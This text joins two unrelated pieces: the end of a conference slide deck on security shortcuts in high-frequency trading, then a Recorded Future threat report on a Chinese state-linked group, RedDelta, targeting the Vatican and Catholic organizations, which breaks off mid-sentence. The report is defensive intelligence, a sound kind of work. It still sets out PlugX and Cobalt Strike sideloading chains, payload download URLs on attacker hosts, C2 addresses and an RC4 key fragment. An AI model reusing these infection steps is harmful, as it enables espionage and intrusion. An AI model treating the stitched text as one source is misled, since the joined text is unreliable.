protocols (tcp)
• Dropped packet is dropped cash
15
proximity
• Proximity relieves many of the speed/latency/
jitter effects
• You’re on the LAN, not the MAN or the WAN
16
latency costs $
• latency has a $$cost associated with it -
measurable and therefore fundable
17
missing?
18
oh crap.
19
dude, where’s my firewall?
• no firewalls...
• they add latency (a lot of latency)
• latency costs $
• risk < cost < profit
20
acl me please?
• no acls
• they add latency
• (most) switches can’t cut through switch
while acls are on
• risk < cost < profit
21
harden this...
• no (meaningful) system hardening
• reduced system loading (stripped bare)
• largely custom interfacing code
(ethernet / infiniband / PCIe)
• and the usual complaints about
maintainability and problem resolution
22
Specialized Systems
23
threat modelling
• we know what’s missing in our usual suite
of controls
• how do we describe it?
• how do we determine what is a reasonable
threat to build protective measures against?
24
THREAT: vendors
• You’re trusting that the marketing slick is
what you’ll get.
• You’re trusting that they haven’t hired any
bad guys.
25
MAYBE: vendors
• How about a vendor developer who alters
the patches you receive so that the
Precision Time Protocol (PTPv2 - 802.1AS)
has a different concept of a microsecond
from the one everyone else is using?
http://www.ieee802.org/1/pages/802.1as.html
26
THREAT: developers
• In most algo-trading, the developer isn’t a
traditional developer with all of the usual
SDLC controls
• The developer is probably a trader or a
trader underling who has live access to the
production algo engine and can make on-
the-fly changes
27
YES: Developers
• Sergey Aleynikov
July 3, 2009
http://www.wired.com/threatlevel/2009/07/aleynikov/
• 32 MEGABYTES of code
from Goldman Sachs
• sentenced to 97 months
in prison (8 years 1
month) and $12,500 fine
http://www.facebook.com/group.php?gid=123550517320
28
THREAT: the insider
• not *that* kind of insider
• how do you deal with a trader (or
administrator) who is utilizing access to
market data networks or exchange
networks to cause negative effects on
other participants?
29
YES: Traders
• Samarth Agrawal
April 16, 2010
http://www.wired.com/threatlevel/2010/04/
bankerarrested/
• several hundred pages
of code from Societe
Generale
• sentenced to 3 years
in prison + 2 years
supervised release +
deportation
30
THREAT: the market
• This is an odd kind of technical threat
• Can the market itself cause issues with
your systems?
• malformed messages
• transaction risk scrutiny
• compromised systems
31
YES: Market
• 2010-05-06 - DJIA drops 900 points in
minutes -- THE FLASH CRASH
• Report from Nanex
http://www.nanex.net/20100506/FlashCrashAnalysis_Part1-1.html
32
Ed Felten’s Summary
1.
Some market participants sent a large number of quote requests to the New York
Stock Exchange (NYSE) computers.
2.
The NYSE normally puts outgoing price quotes into a queue before they are sent
out. Because of the high rate of requests, this queue backed up, so that some
quotes took a (relatively) long time to be sent out.
3.
A quote lists a price and a time. The NYSE determined the price at the time the
quote was put into the queue, and timestamped each quote at the time it left the
queue. When the queues backed up, these quotes would be "stale", in the sense
that they had an old, no-longer-accurate price --- but their timestamps made them
look like up-to-date quotes.
4.
These anomalous quotes confused other market participants, who falsely
concluded that a stock's price on the NYSE differed from its price on other
exchanges. This misinformation destabilized the market.
5.
The faster a stock's price changed, the more out-of-kilter the NYSE
quotes would be. So instability bred more instability, and the market
dropped precipitously.
https://freedom-to-tinker.com/blog/felten/stock-market-flash-crash-attack-bug-or-gamesmanship
33
questioning trust
• is it even possible to trust within this
framework?
• how to ensure that you monitor the
threats?
34
traditional security fails
• 100,000 times too slow
• unwilling to learn that this is a
fundamentally different world
• still focused on checkbox compliance
35
answer the hard one - later
• how to secure custom everything?
• how to be fast enough
• how to make the case that security efforts
reduce risk and preclude disaster
36
do something!
• I’m not talking about hard stuff like code
review, custom application level firewalls,
mysterious FPGA stuff...
• Party like it’s 1999 --
NETWORK SECURITY BASICS
• even a little bit of Layer 4 goodness would help
37
ITSecurity:TNG
• where’s the next next generation...
• juniper and cisco are a start...
• weird severely custom stuff is a start...
• why aren’t we aren’t keeping up?
38
Well, thanks.
What now?
39
DO ANYTHING
• at this point - step up - do anything
• it sounds so terrible to say that but even
developing an architectural understanding is
better than nothing
• make friends and influence people
40
DO ANYTHING
• you’re on the record as saying that you’d
choose performance over security...
http://www.darkreading.com/vulnerability-management/167901026/security/perimeter-security/231002280/most-it-security-pros-
disabling-security-functions-in-favor-of-network-speed.html (July 21, 2011)
41
product vendors...
• time to challenge your vendors
• you want more than checkboxes
• there are other markets besides
credit card compliance
• there is money to spend on whatever
exotic thing you want to develop
42
product vendors...
• Some product vendors are getting this.
• Most aren’t.
• Because we’re “not asking for it”!?!
43
risk / process / policy / grc
• work with your business folks
• they understand risk - probably better than you do
• they have a different tolerance for risk
• understand how to use their knowledge to help
you make good decisions
• do not blindly follow dogmatic statements
44
risk / process / policy / grc
• You’re not going to be able to change their
minds about the cost of latency.
• You can work with them to change your
understanding of how to do things.
• Just because you did it that way last year
doesn’t mean that’s still the best option.
45
compliance
• IT compliance people, meet the financial
compliance people - you have things to talk
about.
46
compliance
• The SEC is taking an
active interest
• July 26, 2011
announcement of the
Large Trader Reporting
Rule (13h-1)
http://sec.gov/news/press/
2011/2011-154.htm
• There is more to come
- other regulators are
watching.
47
in the trenches
ORIGINAL RESEARCH
48
in the trenches
• understand your business partners’ needs
• look for solutions
• build PoC rigs to test
49
in the trenches
• encourage vendors to get with it
• spend time looking at the truly weird stuff
• be prepared for the continued downward
pressure on transaction times
50
Don’t Panic
51
Q & A
twitter: @myrcurial
[email protected]
52
Credits, Links and Notices
Thanks:
All of you,
The Dark Tangent & the DEF CON team,
My Friends, My Family
Colophon:
twitter, wikipedia, fast music, caffeine, my lovely wife and hackerish
children, blinky lights, shiny things, angst, modafinil & altruism.
Me:
http://myrcurial.com http://doinginfosecright.com
http://securosis.com http://liquidmatrix.org
Credits:
Chicago Board of Trade Image: Daniel Schwen
IBM Mainframe Image: ChineseJetPilot
New York Stock Exchange Image: Randy Le’Moine Photography
Toronto Stock Exchange Image: Jenny Lee Silver
http://creativecommons.org/licenses/by-nc-sa/2.5/ca/
53 | pdf |
CHINESE STATE-SPONSORED
GROUP ‘REDDELTA’ TARGETS
THE VATICAN AND CATHOLIC
ORGANIZATIONS
CTA-CN-2020-0728
By Insikt Group
®
CYBER
THREAT
ANALYSIS
CHINA
Recorded Future® | www.recordedfuture.com
CTA-CN-2020-0728
1
Insikt Group® researchers used proprietary Recorded Future Network Traffic
Analysis and RAT controller detections, along with common analytical techniques, to
identify and profile a cyberespionage campaign attributed to a suspected Chinese
state-sponsored threat activity group, which we are tracking as RedDelta.
Data sources include the Recorded Future® Platform, Farsight Security’s
DNSDB, SecurityTrails, VirusTotal, Shodan, BinaryEdge, and common OSINT
techniques.
This report will be of greatest interest to network defenders of private sector,
public sector, and non-governmental organizations with a presence in Asia, as well
as those interested in Chinese geopolitics.
Executive Summary
From early May 2020, The Vatican and the Catholic Diocese of
Hong Kong were among several Catholic Church-related organizations
that were targeted by RedDelta, a Chinese-state sponsored threat
activity group tracked by Insikt Group. This series of suspected network
intrusions also targeted the Hong Kong Study Mission to China and the
Pontifical Institute for Foreign Missions (PIME), Italy. These organizations
have not been publicly reported as targets of Chinese threat activity
groups prior to this campaign.
These network intrusions occured ahead of the anticipated
September 2020 renewal of the landmark 2018 China-Vatican provisional
agreement, a deal which reportedly resulted in the Chinese Communist
Party (CCP) gaining more control and oversight over the country’s
historically persecuted “underground” Catholic community. In addition
to the Holy See itself, another likely target of the campaign includes
the current head of the Hong Kong Study Mission to China, whose
predecessor was considered to have played a vital role in the 2018
agreement.
The suspected intrusion into the Vatican would offer RedDelta
insight into the negotiating position of the Holy See ahead of the deal’s
September 2020 renewal. The targeting of the Hong Kong Study Mission
and its Catholic Diocese could also provide a valuable intelligence source
for both monitoring the diocese’s relations with the Vatican and its
position on Hong Kong’s pro-democracy movement amidst widespread
protests and the recent sweeping Hong Kong national security law.
While there is considerable overlap between the observed TTPs of
RedDelta and the threat activity group publicly referred to as Mustang
Panda (also known as BRONZE PRESIDENT and HoneyMyte), there are
a few notable distinctions which lead us to designate this activity as
RedDelta:
The version of PlugX used by RedDelta in this campaign uses
a different C2 traffic encryption method and has a different
configuration encryption mechanism than traditional PlugX.
The malware infection chain employed in this campaign has not been
publicly reported as used by Mustang Panda.
In addition to the targeting of entities related to the Catholic Church,
Insikt Group also identified RedDelta targeting law enforcement and
government entities in India and a government organization in Indonesia.
Key Judgments
The targeting of entities related to the Catholic church is likely
indicative of CCP objectives in consolidating control over the
“underground” Catholic church, “sinicizing religions” in China, and
diminishing the perceived influence of the Vatican within China’s
Catholic community.
Due to RedDelta’s targeting of organizations that heavily align to
Chinese strategic interests, use of shared tooling traditionally used
by China-based groups, and overlaps with a suspected Chinese
state-sponsored threat activity group, Insikt Group believes that
the group likely operates on behalf of the People’s Republic of
China (PRC) government.
The identified RedDelta intrusions feature infrastructure, tooling,
and victimology overlap with the threat activity group publicly
reported as Mustang Panda (also known as BRONZE PRESIDENT
and HoneyMyte). This includes the use of overlapping network
infrastructure and similar victimology previously attributed to this
group in public reporting, as well as using malware typically used
by Mustang Panda, such as PlugX, Poison Ivy, and Cobalt Strike.
Figure 1: Selection of main differences between PlugX variants and the infection chain
used by RedDelta and Mustang Panda.
CYBER THREAT ANALYSIS | CHINA
www.recordedfuture.com | Recorded Future®
CTA-CN-2020-0728
2
Threat Analysis
Overview of Catholic Church Intrusions
Using Recorded Future RAT controller detections and network traffic analysis
techniques, Insikt Group identified multiple PlugX C2 servers communicating with
Vatican hosts from mid-May until at least July 21, 2020. Concurrently, we identified
Poison Ivy and Cobalt Strike Beacon C2 infrastructure also communicating with
Vatican hosts, a Vatican-themed phishing lure delivering PlugX, and the targeting
of other entities associated with the Catholic Church.
The lure document shown above, which has been previously reported on in
relation to links to Hong Kong Catholic Church targeting, was used to deliver a
customized PlugX payload that communicated with the C2 domain systeminfor[.]
com. The document purported to be an official Vatican letter addressed to the
current head of the Hong Kong Study Mission to China. It is currently unclear
whether the actors created the document themselves, or whether it is a legitimate
document they were able to obtain and weaponize. Given that the letter was
directly addressed to this individual, it is likely that he was the target of a
spearphishing attempt. Additionally, as this sample was compiled after signs of
an intrusion within the Vatican network, it is also possible that the phishing lure
was sent through a compromised Vatican account. This hypothesis is supported by
the identification of communications between PlugX C2s and a Vatican mail server
in the days surrounding the sample’s compilation date and its first submission to
public malware repositories.
Background
China and the Catholic Church
For many years, Chinese state-sponsored groups have targeted religious
minorities within the the PRC, particularly those within the so-called “Five
Poisons,” such as Tibetan, Falun Gong, and Uighur muslim communities. Insikt
Group has publicly reported on aspects of this activity, such as our findings on
RedAlpha, the ext4 backdoor, and Scanbox watering hole campaigns targeting the
Central Tibetan Administration, other Tibetan entities, and the Turkistan Islamic
Party. Most recently, a July 2020 U.S. indictment identified the targeting of emails
belonging to Chinese Christian religious figures — a Xi’an-based pastor, as well as
an underground church pastor in Chengdu, the latter of whom was later arrested
by the PRC government, by two contractors allegedly operating on behalf of the
Chinese Ministry of State Security (MSS). Regional branches of China’s Ministry
of Public Security (MPS) have also been heavily involved in digital surveillance of
ethnic and religious minorities within the PRC, most notably by the Xinjiang Public
Security Bureau (XPSB) in the case of Uighur muslims.
Historically, the PRC has had a highly turbulent relationship with the Vatican
and its governing body, the Holy See. In particular, the Holy See’s recognition
of bishops within China’s historically persecuted “underground” Catholic church
traditionally loyal to the Vatican and its relationship with Taiwan has maintained
an absence of official relations since the 1950s. The CCP perceived this behavior
as the Holy See interfering in religious matters within China. In September 2018,
the PRC and the Holy See reached a landmark two-year provisional agreement,
marking a significant step towards renewed diplomatic relations.
Under the provisional agreement, China would regain more control over
underground churches, and the Vatican in turn would gain increased influence
over the appointment of bishops within the state-backed “official” Catholic church.
The deal was met with a mixed reaction, with critics arguing that the deal was
a betrayal of the underground church and would lead to increased persecution
of its members. Many of the harshest criticisms came from clergy within Hong
Kong. A year after the agreement, numerous reports noted the Vatican’s silence in
response to the Hong Kong protests beginning in late 2019, in what critics called
an effort to avoid offending Beijing and jeopardizing the 2018 agreement.
Figure 2: Intelligence Card for RedDelta PlugX C2 Server 167.88.180[.]5.
Figure 3: Vatican lure document targeting the head of Hong Kong study mission to China.
CYBER THREAT ANALYSIS | CHINA
Recorded Future® | www.recordedfuture.com
CTA-CN-2020-0728
3
The head of the Hong Kong Study Mission is considered the Pope’s de facto
representative to China and a key link between Beijing and the Vatican. The
predecessor to this role played a key part in the finalization of the 2018 provisional
China-Vatican agreement, making his successor a valuable target for intelligence
gathering ahead of the deal’s expiry and likely renewal in September 2020.
Further entities associated with the Catholic Church were also targeted by
RedDelta in June and July 2020 using PlugX, including the mail servers of an
international missionary center based in Italy and the Catholic Diocese of Hong
Kong.
Insikt Group identified two additional phishing lures loading the same
customized PlugX variant, which both communicated with the same C2
infrastructure as the Vatican lure. The first sample included a lure document
spoofing a news bulletin from the Union of Catholic Asian News regarding the
impending introduction of the new Hong Kong national security law. The content
of the lure file, titled “About China’s plan for Hong Kong security law.doc,” was
taken from a legitimate Union of Catholic Asian News article. The other sample also
references the Vatican using a document titled “QUM, IL VATICANO DELL’ISLAM.
doc” for the decoy document. This particular decoy document translates as “Qum,
the Vatican of Islam,” referring to the Iranian city of Qum (Qom), an important
Shi’ite political and religious center. It is taken from the writings of Franco Ometto,
a Italian Catholic academic living in Iran. Although the direct target of these two
lures are unclear, both relate to the Catholic church.
We believe that this targeting is indicative of both China’s objective in
consolidating increased control over the underground Catholic Church within
China, and diminishing the perceived influence of the Vatican on Chinese Catholics.
Similarly, a focus on Hong Kong Catholics amid pro-democracy protests and the
recent sweeping national security law is in line with Chinese strategic interests,
particularly given the Anti-Beijing stance of many of its members, including former
Hong Kong Bishop Cardinal Joseph Zen Ze-kiun.
Other Targeted Organizations
Insikt Group identified several additional suspected victims communicating
with RedDelta C2 infrastructure. While metadata alone does not confirm a
compromise, the high volume and repeated communications from hosts within
targeted organizations to these C2s are sufficient to indicate a suspected
intrusion. A full list of identified targeted organizations are summarized below:
Figure 4: Union of Catholic Asian News article lure document (left), and Qum, the Vatican of Islam
lure document (right).
CYBER THREAT ANALYSIS | CHINA
www.recordedfuture.com | Recorded Future®
CTA-CN-2020-0728
4
The organizations targeted by RedDelta in this campaign largely align
with historical activity publicly reported on the threat activity group Mustang
Panda, with the group previously linked to intrusion attempts targeting the Police
of the Sindh Province in Pakistan, law enforcement organizations in India, and
the targeting of entities within Myanmar, Hong Kong, and Ethiopia. The group is
also suspected to have previously targeted China Center (China Zentrum e.V),
a non-profit organization whose members includes Catholic aid organizations,
religious orders and dioceses in Germany, Austria, Switzerland, and Italy, and other
organizations associated with religious and minority groups.
Infrastructure Analysis
In this campaign, RedDelta favored three primary IP hosting providers, and
used multiple C2 servers within the same /24 CIDR ranges across intrusions.
Preferred hosting providers included 2EZ Network Inc (Canada), Hong Kong
Wen Jing Network Limited, and Hong Kong Ai Jia Su Network Limited. The group
consistently registered domains through GoDaddy, with WHOIS data providing
additional linkages between domains used by the threat activity group. Insikt
Group identified two primary clusters of RedDelta infrastructure used throughout
this campaign, referred to as the “PlugX cluster” and the “Poison Ivy and Cobalt
Strike cluster.” A Maltego chart is included below displaying these clusters.
Targeted Organization
Sector
Country/Region of
Operation
Date of Observed
Activity
RedDelta C2 IP(s)
The Vatican/Holy See
Religious
The Vatican
May 21–July 21, 2020
85.209.43[.]21,
103.85.24[.]136,
103.85.24[.]149,
103.85.24[.]190,
154.213.21[.]70,
154.213.21[.]73,
154.213.21[.]207,
167.88.180[.]5,
167.88.180[.]32,
Catholic Diocese of
Hong Kong
Religious
Hong Kong
May 12–July 21, 2020
103.85.24[.]136,
167.88.180[.]5,
167.88.180[.]32,
Pontifical Institute for
Foreign Missions (PIME),
Milan
Religious
Italy
June 2–26 2020
85.209.43[.]21,
Sardar Vallabhbhai Patel
National Police Academy
Law Enforcement
India
February 16–June 25,
2020
103.85.24[.]136,
167.88.180[.]5,
Ministry of Home
Affairs (Kementerian
Dalam Negeri Republik
Indonesia)
Government
Indonesia
May 21–July 21, 2020
85.209.43[.]21,
Airports Authority of
India
Government
India
June 18–July 21, 2020
154.213.21[.]207,
Other Unidentified
Victims
N/A
Myanmar, Hong Kong,
Ethiopia, Australia
May–July 2020
85.209.43[.]21,
103.85.24[.]136,
167.88.180[.]5,
Table 1: List of organizations targeted by RedDelta.
CYBER THREAT ANALYSIS | CHINA
Recorded Future® | www.recordedfuture.com
CTA-CN-2020-0728
5
‘Ma Ge Bei Luo Xiang Gang Jiu Dian’ and the PlugX
Cluster
Vatican hosts and several other victim organizations were communicating
with the PlugX C2 167.88.180[.]5 from May until June 10, 2020. This IP hosted the
domain cabsecnow[.]com over this time period. Cabsecnow[.]com then resolved to
a new IP, 103.85.24[.]136, from June 10 onwards. The suspicious network activity
continued after the C2 IP was updated, increasing our confidence in the likelihood
of intrusion at the targeted organizations.
The cabsecnow[.]com domain shares a similar naming convention to a publicly
reported domain linked to Mustang Panda, cab-sec[.]com. WHOIS data revealed
that both domains were registered several seconds apart through GoDaddy on
September 17, 2019, with the same registrant organization listed: “Ma Ge Bei Luo
Xiang Gang Jiu Dian.” This registrant organization is associated with eight domains
in total, five of which have previously been publicly linked to Mustang Panda
activity by Anomali and Dell SecureWorks. “Ma Ge Bei Luo Xiang Gang Jiu Dian”
translates from Mandarin to Marco Polo Hotel Hong Kong, a legitimate Hong Kong
hotel, although it is unclear why the actor chose this organization when registering
these domains.
Another PlugX C2, 85.209.43[.]21, was also identified communicating with
several hosts within the same targeted organizations (see Table 1). This IP has
hosted ipsoftwarelabs[.]com since November 2019, a domain previously identified
as a Mustang Panda PlugX C2.
Finally, the C2 domain associated with the Vatican and Union of Catholic
Asian News lures, systeminfor[.]com, was hosted on 167.88.180[.]32 since June
2020. This IP has also hosted lameers[.]com since February 2020, another PlugX
C2 identified in activity targeting Hong Kong.
Cobalt Strike/Poison Ivy Cluster
Associated Domain
C2 IP Address
Malware Variant
web.miscrosaft[.]com
154.213.21[.]207
Poison Ivy
lib.jsquerys[.]net
154.213.21[.]70
Cobalt Strike
lib.hostareas[.]com
154.213.21[.]73
Unknown
Table 3: Cobalt Strike/Poison Ivy cluster domains.
The
second
cluster
featured
Cobalt
Strike
and
Poison
Ivy
malware C2 infrastructure. A Poison Ivy sample (SHA256:9bac74c592a
36ee249d6e0b086bfab395a37537ec87c2095f999c00b946ae81d) submitted to
a public malware repository from Italy in early June 2020, several days after the
first evidence of activity between Vatican hosts and this C2, was configured to
communicate with a spoofed Microsoft domain, web.miscrosaft[.]com, hosted
on 154.213.21[.]207. Suspicious network traffic between this Poison Ivy C2 and
several Vatican hosts, as well as an Indian aviation entity, were observed by Insikt
Group analysts.
Two other IP addresses within the same 24-bit CIDR range, 154.213.21[.]73
and 154.213.21[.]70, were also identified communicating with overlapping
Vatican infrastructure at this time. A Cobalt Strike sample (SHA256:
7824eb5f173c43574593bd3afab41a60e0e2ffae80201a9b884721b451e6d935),
uploaded from an Italian IP address to a malware multiscanner repository as a
zipped file the same day as the Poison Ivy sample, also used the 154.213.21[.]70
IP for command and control.
Figure 5: Maltego chart of RedDelta infrastructure.
Domain
Registration Timestamps
sbicabsec[.]com
November 26, 2019 10:31:18Z
systeminfor[.]com
November 19, 2019 07:06:03Z
cabsecnow[.]com
September 17, 2019 02:37:37Z
cab-sec[.]com
September 17, 2019 02:37:34Z
forexdualsystem[.]com
October 22, 2018 01:09:46Z*
lionforcesystems[.]com
October 22, 2018 01:09:45Z*
apple-net[.]com
October 22, 2018 01:09:46Z*
wbemsystem[.]com
October 17, 2018 06:51:02Z*
Table 2: Domains with “Ma Ge Bei Luo Xiang Gang Jiu Dian” registrant organization.
(*Domains now re-registered)
Figure 6: Context panel from the Recorded Future Intelligence Card™ for ipsoftwarelabs[.]com.
CYBER THREAT ANALYSIS | CHINA
www.recordedfuture.com | Recorded Future®
CTA-CN-2020-0728
6
This cluster of activity does not overlap with the infrastructure identified
in the PlugX cluster. The WHOIS registration data for the domains miscrosaft[.]
com and hostareas[.]com contains the registrant organization “sec.” While less
distinct than the “Ma Ge Bei Luo Xiang Gang Jiu Dian’’ registrant identified earlier
in the PlugX cluster, there are still relatively few domains associated with this
organization, and fewer still that were registered through GoDaddy. Using these
characteristics, we identified that the domains svrhosts[.]com, strust[.]club, and
svchosts[.]com all match this criteria and are previously reported Mustang Panda
Cobalt Strike C2 domains. In particular, svrhosts[.]com and svchosts[.]com were
both registered at the same time as hostareas[.]com on February 3, 2019 through
GoDaddy.
Malware Analysis
While there is notable targeting and infrastructure overlap between this
RedDelta campaign and publicly reported Mustang Panda activity, there are some
deviations in tactics, techniques, and procedures (TTPs) used in both. For instance,
Mustang Panda has typically used Windows Shortcut (LNK) files containing an
embedded HTA (HTML Application) file with a VBScript or PowerShell script to load
PlugX and Cobalt Strike Beacon payloads. However, in this campaign, RedDelta
used ZIP files containing legitimate executables masquerading as lure documents,
a notable departure from Mustang Panda activity that has been publicly reported
previously. This legitimate executable is used to load a malicious DLL also
present within the ZIP file through DLL sideloading, before the target is shown
a decoy document. While Mustang Panda have used DLL sideloading previously,
the PlugX variant used in association with this campaign has key differences
from more traditional PlugX variants, particularly in the C2 protocol used and
the configuration encoding within the samples, leading us to refer to it as the
“RedDelta PlugX” variant below — however, this is not intended to suggest that
this variant is used exclusively by this group and is in reference to the first group
we have seen using this variant.
Figure 7: Execution diagram of the malware associated with RedDelta PlugX.
RedDelta PlugX: ‘Hong Kong Security Law’ Lure
The first sample, titled “About China’s plan for Hong Kong security
law.zip”
(SHA256:86590f80b4e1608d0367a7943468304f7eb665c9195
c24996281b1a958bc1512), corresponds to the Union of Catholic Asian News lure
delivering the RedDelta PlugX variant. Although Insikt Group does not have full
visibility into this infection chain, the ZIP file is likely to have been delivered via a
spearphishing email. The ZIP contains two files:
File Name
About China’s plan for Hong Kong security law.exe
SHA256 Hash
6c959cfb001fbb900958441dfd8b262fb33e052342
948bab338775d3e83ef7f7 Hash
File Name
wwlib.dll
SHA256 Hash
f6e5a3a32fb3aaf3f2c56ee482998b09a6ced0a60
c38088e7153f3ca247ab1cc Hash
Stage 1: Wwlib.dll DLL Sideload and Hk.dat Download
and Execution
“About China’s plan for Hong Kong security law.exe” is a legitimate Windows
loader for Microsoft Word that is vulnerable to sideloading. When executed, it
sideloads the malicious DLL, “wwlib.dll.”
Wwlib.dll initializes the loading stage by downloading, decoding, and executing
an XOR-encoded Windows executable file, hk.dat, from http://167.88.180[.]198/
hk.dat. Next, wwlib.dll will extract a Word document, “About China’s plan for Hong
Kong security law.docx” from its resource section and open it to make it appear to
the user that a legitimate Microsoft Word document was opened.
Stage 2: Hk.exe/AAM Updates.exe DLL Sideloading to
Load PlugX Variant
After “hk.dat” is decoded and executed, it will create three files in the
C:\%APPDATA%/local/temp directory:
• Hk.exe (SHA256: 0459e62c5444896d5be404c559c834ba455fa5cae1689c
70fc8c61bc15468681) - A legitimate Adobe executable that is vulnerable
to DLL sideloading
CYBER THREAT ANALYSIS | CHINA
Recorded Future® | www.recordedfuture.com
CTA-CN-2020-0728
7
• Hex.dll (SHA256: bc6c2fda18f8ee36930b469f6500e28096eb6795e5fd17c
44273c67bc9fa6a6d) - The malicious DLL sideloaded by hk.exe that
decodes and loads adobeupdate.dat
• Adobeupdate.dat (SHA256: 01c1fd0e5b8b7bbed62bc8a6f7c9ceff1725d4ff
6ee86fa813bf6e70b079812f) - The RedDelta PlugX variant loader
Next, “hk.exe” is executed and creates copies of the files “adobeupdate.dat,”
“hex.dll,” and itself renamed as “AAM Updates.exe” in the folder “C:\ProgramData\
AAM UpdatesIIw.” “AAM Updates.exe” is then executed, starting the installation
process by sideloading the malicious “hex.dll.” “Hex.dll” will decode and execute
“adobeupdate.dat,” which ultimately leads to the execution of the RedDelta PlugX
variant in memory. This use of DLL sideloading, including the use of this specific
Adobe executable, aligns with recent public reporting of Mustang Panda PlugX
use (1, 2).
RedDelta PlugX: ‘Qum, the Vatican of Islam’ Lure
The second PlugX sample uses the same loading method identified above. In
this case, the same WINWORD.exe executable is used to load another malicious
wwlib.dll file. The sample then contacts http://103.85.24[.]190/qum.dat to retrieve
the XOR-encoded Windows executable file, qum.dat. This sample uses the same
C2 as above, www.systeminfor[.]com.
RedDelta PlugX: Vatican Lure Targeting Hong Kong
Study Mission
The final PlugX sample featuring the Vatican Hong Kong Study Mission
lure also uses largely the same PlugX loading method. In this case, the ZIP file
contains a benign Adobe Reader executable, AcroRd32.exe, renamed “DOC-
2020-05-15T092742.441.exe,” which is used to load the malicious acrord32.dll
file through DLL sideloading. In this case the sample retrieves the file dis.dat from
http://167.88.180[.]198/dis.dat and uses the same C2 referenced in the previous
samples.
RedDelta PlugX: Installation Process
Insikt Group performed detailed analysis on the DAT files related to the “Union
of Catholic Asian News” and “Qum, the Vatican of Islam” lure. Analysis of these
samples showed two DAT files were downloaded from the URLs listed in the table
below:
In each case, the file (“hk.dat” or “qum.dat“) is downloaded and executed after
initial execution of the phishing lure, as described above in “Stage 1: Wwlib.dll DLL
Sideload and Hk.dat Download and Execution.” Both files are RtlCompress/LZNT1
compressed, as well as XOR-encoded. The XOR key precedes the encoded data,
allowing the file to be more easily decoded during static analysis. A Python script
to decompress and decode the payload can be found on our GitHub repository.
After the DAT files are decompressed and decoded, they are executed. The
execution details for “hk.dat” have been detailed above (see: “Stage 2: Hk.exe/AAM
File Name
Download Location
SHA256 Hash
hk.dat
http://167.88.180[.]198/hk.dat
2fb4a17ece461ade1a2b63bb8db1
9947636c6ae39c4c674fb4b7d4f9
0275d20
qum.dat
http://103.85.24[.]190/qum.
dat
476f80521bf6789d02f475f67e0f4
ede830c4a700c3f7f64d99e8118
35a39e
Updates.exe DLL Sideloading to Load PlugX Variant“) and are nearly identical to
that of “qum.dat.” As with the hk.dat sample associated with the “Union of Catholic
Asian News” lure, the main purpose of this stage of the malware is to perform the
DLL sideloading step in order to execute the PlugX variant.
Again, the final stage consists of three files: a non-malicious executable, a
malicious sideloaded DLL, and the encoded DAT file which are all used to sideload
the final payload. This is consistent with a typical PlugX installation.
Like the first-stage DAT files, the PlugX loaderDAT file is XOR-encoded and
the decode key precedes the encoded data in the file; however, they are not
RtlCompress/LZNT1 compressed as the initial stage files are. A Python script to
decode the PlugX loader, as well as the configuration block, is contained on our
GitHub repository.
RedDelta: An Updated PlugX Variant
The PlugX variant used in the RedDelta campaign is similar to the PlugX
variants previously associated with Mustang Panda by Avira and Anomali. Both
make heavy use of stack strings as an obfuscation mechanism, as seen in Figure
8, making it harder for an analyst to use strings to determine the functionality or
purpose of the code.
CYBER THREAT ANALYSIS | CHINA
www.recordedfuture.com | Recorded Future®
CTA-CN-2020-0728
8
Figure 8: Comparison of Anomali/Avira PlugX variant stack string implementation and RedDelta stack
string implementation.
However, the configuration block for the RedDelta PlugX variant has one
key distinction: the Avira-reported Mustang Panda configuration block decoding
function looks for the string “XXXXXXXX” to determine whether the configuration
is encoded, while the RedDelta variant looks for the string “########.” Apart from
the different demarcator strings, both variants use the same rolling XOR encoding
with the key “123456789.” The configuration block decode routine can be seen
in Figure 9, below.
CYBER THREAT ANALYSIS | CHINA
Recorded Future® | www.recordedfuture.com
CTA-CN-2020-0728
9
Figure 9: Comparison of configuration block in Anomali/Avira PlugX (showing the “XXXXXXXX”
demarcator) and the RedDelta configuration block (showing the “########” demarcator).
A Python implementation of this algorithm can be observed in Figure 10,
below.
Figure 10: Python implementation of RedDelta PlugX configuration block decoding mechanism.
In conventional PlugX samples, the configuration block is encrypted with a
more complex algorithm using multiple keys in combination with shift left and shift
right bitwise operations. For example, the Python code implementing this algorithm,
as seen in Figure 11, was created by Kyle Creyts based on Takahiro Haruyama’s
extensive research and analysis on PlugX.
Figure 11: Python implementation of traditional PlugX configuration block decoding mechanism by
Kyle Creyts.
The configuration block encryption associated with the RedDelta variant is
considerably less sophisticated when compared to traditional PlugX samples, and
while both make use of XOR-based ciphers, the simple algorithm used by RedDelta
would be easier to brute force by an analyst.
CYBER THREAT ANALYSIS | CHINA
www.recordedfuture.com | Recorded Future®
CTA-CN-2020-0728
10
Command and Control Protocol
The C2 protocol used for the RedDelta PlugX malware differs from the Mustang
Panda PlugX. While both variants use the HTTP POST method common to PlugX
including the number of “61456” in the POST header field which is a clear indicator
of a PlugX HTTP POST. However, the RedDelta variant does not include the URI
string “/update?wd=” more commonly associated with PlugX, as seen in Figure 12.
Figure 12: HTTP POST request from Anomali/Avira PlugX variant and RedDelta PlugX variant.
The RedDelta PlugX variant encrypts its C2 communications very differently
when compared to the Mustang Panda variant reported by Anomali and Avira.
Instead of using XOR encoding, RedDelta uses RC4 encryption where the first
10 bytes of the passcode are hardcoded and the last four bytes are randomly
generated and included as a key within the TCP packet so that the communication
can be decrypted. The hardcoded portion of the RC4 passphrase is “!n&U*O%Pb$.”
Figure 13 shows the function where the RC4 passphrase is defined as well as
where the last four bytes are appended to create the full key. A Python script to
decode the RedDelta C2 communication from a supplied PCAP can be found on
our GitHub repository.
Despite the different C2 encryption schemes, both RedDelta and Mustang
Panda variants’ C2 traffic decrypts to the familiar PlugX header format, as shown
in Figure 14.
Figure 14: PlugX header and data.
In conventional PlugX samples, the C2 uses the same algorithm as in the
configuration decode (see Figure 11), with part of the key being the first four bytes
of the TCP transmission. While the RedDelta PlugX variant also uses the first four
bytes of the TCP transmission as a part of the key, the use of RC4 for C2 encryption
demonstrates a departure from the usual PlugX C2 traffic encryption mechanism.
Figure 13: C2 encryption/decryption routine showing the first four hardcoded bytes of the
RC4 key used in RedDelta PlugX variant.
CYBER THREAT ANALYSIS | CHINA
Recorded Future® | www.recordedfuture.com
CTA-CN-2020-0728
11
While Recorded Future has not done extensive code analysis to further
compare the samples, we have highlighted fundamental differences between the
RedDelta PlugX variants and conventional PlugX, notably in the configuration block
and C2 communication. Additionally, while RedDelta has implemented a modular
delivery system based on traditional PlugX tactics, it also provides the group with
the ability to change, enhance or remove functionality as needed.
Cobalt Strike
The file, OneDrive.exe, is responsible for loading the Cobalt Strike payload.
When executed, OneDrive will reach out to http://154.213.21[.]27/DotNetLoader40.
